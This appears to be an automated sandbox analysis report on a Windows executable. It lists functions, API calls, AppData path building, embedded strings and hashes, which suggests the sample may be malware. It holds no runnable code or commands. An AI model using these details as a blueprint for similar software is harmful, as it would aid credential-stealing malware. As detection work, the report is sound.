                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 6ee1dafba3989b5bcdec843ebc03aec4339cbf968e020fd18d783047e6c35333
                                • Instruction ID: fb6a651b763664b8049e395997ae5f824c471e12c3b99ec50da5b7a94d7efad6
                                • Opcode Fuzzy Hash: 6ee1dafba3989b5bcdec843ebc03aec4339cbf968e020fd18d783047e6c35333
                                • Instruction Fuzzy Hash: 3541D37050479CAEDB218A248C89FFB7BFADB45704F1844ECE9CA86182E2759B458F74
                                Function 006A8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A8996
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1D5
                                  • Part of subcall function 006CA1C0: std::exception::exception.LIBCMT ref: 006CA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A89CD
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 72d418c919a61d483875b51f1b21fa552f5290a49fc7ac7e20f4431feb465d9a
                                • Instruction ID: a9b0584d93dd7ad81e2349498a7e361405ee4740e3edf4ab761afc5ad41148b3
                                • Opcode Fuzzy Hash: 72d418c919a61d483875b51f1b21fa552f5290a49fc7ac7e20f4431feb465d9a
                                • Instruction Fuzzy Hash: 1421D8727006504FC720AA5CE840A6AF79BDBA2761B15097FF142CB641DE71DC41CBA9
                                Function 006A8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A8883
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 18b0cac9ec35b9c29dc288b343ecc5742ca12c5b945ea59a2cbcaee6de76c408
                                • Instruction ID: 3e706e08070cef6180e06972dbc79e578e89aaf5bb56407de710926a3a5db7b8
                                • Opcode Fuzzy Hash: 18b0cac9ec35b9c29dc288b343ecc5742ca12c5b945ea59a2cbcaee6de76c408
                                • Instruction Fuzzy Hash: 3531B7B5E005199FCB08DF58C8906AEBBB6EB89350F188269E905EB344DB30AD01CBD1
                                Function 006C5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5922
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: b0ec07754d96941ce82148d08c4b6959198e8dc8f8b6dd6650dd6e465a75e2de
                                • Instruction ID: 40aa5c23b61546ea90571440f9c03e9876c317f58c153aa5f8869af361636306
                                • Opcode Fuzzy Hash: b0ec07754d96941ce82148d08c4b6959198e8dc8f8b6dd6650dd6e465a75e2de
                                • Instruction Fuzzy Hash: D9112131704A80CBC7218B2CEC00B29B7E3EB92761F150ADEE0D687795D771E881C7A5
                                Function 006C3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,006CA430,000000FF), ref: 006C3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C3D27
                                • wsprintfA.USER32 ref: 006C3D37
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 199654da9b16d6d0ab704437e8436ae12ef040e10b2fe616502fa2e5cb884e53
                                • Instruction ID: c8e6bbe2761083651b0c7310479466ceac8d3f9d375b33d6a7d998caa612a1fb
                                • Opcode Fuzzy Hash: 199654da9b16d6d0ab704437e8436ae12ef040e10b2fe616502fa2e5cb884e53
                                • Instruction Fuzzy Hash: FE01D271641B14BFE7105B54EC0AF6ABBB8FB45B62F00421AFA05973D0CBB41D00CBA1
                                Function 006C926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 006C9279
                                  • Part of subcall function 006C87FF: __amsg_exit.LIBCMT ref: 006C880F
                                • __amsg_exit.LIBCMT ref: 006C9299
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit$__getptd
                                • String ID: Xum$Xum
                                • API String ID: 441000147-2611970071
                                • Opcode ID: e11879c033c52570193586c9c7518403877811b1a99266c4a53b3febed7eef78
                                • Instruction ID: 07d699c6680cd5dc1ed57491bcd067e3b7a80886da91db9d9cfb299110aa1669
                                • Opcode Fuzzy Hash: e11879c033c52570193586c9c7518403877811b1a99266c4a53b3febed7eef78
                                • Instruction Fuzzy Hash: 3301C432D17721ABD761AB689409FBD7353EF00B10F55101DE88467790DB286E41CBEA
                                Function 006A8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A8737
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 66f568c856c9ba891977430dd777c2c96c802d5a463829602ec71135204686b2
                                • Instruction ID: 511e5cf3fbea89d37fe541c72b51675009adf2500bc67a06e871e1a50c57b23b
                                • Opcode Fuzzy Hash: 66f568c856c9ba891977430dd777c2c96c802d5a463829602ec71135204686b2
                                • Instruction Fuzzy Hash: E6F09A37F000220F8354B43D8D8449EA94796E639033AD769E81AEF399EC70EC829AD4
                                Function 006C86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C781C: __mtinitlocknum.LIBCMT ref: 006C7832
                                  • Part of subcall function 006C781C: __amsg_exit.LIBCMT ref: 006C783E
                                • ___addlocaleref.LIBCMT ref: 006C8756
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xum$xtm
                                • API String ID: 3105635775-3974556228
                                • Opcode ID: b86343e5a8fbc6b2ef6629a12399f04af0ac82402a26af7548c957b681bd5468
                                • Instruction ID: 2f4185135e8eaf127bf147c345a80af55197dddb6e82f7dff7a2b2fc27c7c1a8
                                • Opcode Fuzzy Hash: b86343e5a8fbc6b2ef6629a12399f04af0ac82402a26af7548c957b681bd5468
                                • Instruction Fuzzy Hash: A301C871845B009ED760AF75D809B69FBE1EF10320F20891EE1DA576E1CFB4A644CF15
                                Function 006BE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE573
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE581
                                • lstrcat.KERNEL32(?,0133DBA0), ref: 006BE59C
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 731157dfd64eb14d9d11c012260c5c6e466524e394667ec1fe665822b05b9506
                                • Instruction ID: a652a4e33adc57ddf9381877bb9e4f04f1c19f513dd60e92c5407f8699330c27
                                • Opcode Fuzzy Hash: 731157dfd64eb14d9d11c012260c5c6e466524e394667ec1fe665822b05b9506
                                • Instruction Fuzzy Hash: 9B51B8B5A50118AFC794FB54DC52EEE33BAFB48310F04059DFA1687251EE31AE808F95
                                Function 006C1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006C1FDF, 006C1FF5, 006C20B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 7f3a9e5d094f8a94d9ee6761c2b0f082debe3f68b0d97e862592725c766a1b37
                                • Instruction ID: 31ac89d3cf6a83a1bd79188e51655731b2cedf9115f6e6e8862584e939e95c1a
                                • Opcode Fuzzy Hash: 7f3a9e5d094f8a94d9ee6761c2b0f082debe3f68b0d97e862592725c766a1b37
                                • Instruction Fuzzy Hash: F3212839A1018A8BD720EB35C4A4BFDF767DF80362F84445BCC194B391E336194AD796
                                Function 006BEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 006BEBF1
                                • lstrcat.KERNEL32(?,0133ED28), ref: 006BEC0C
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
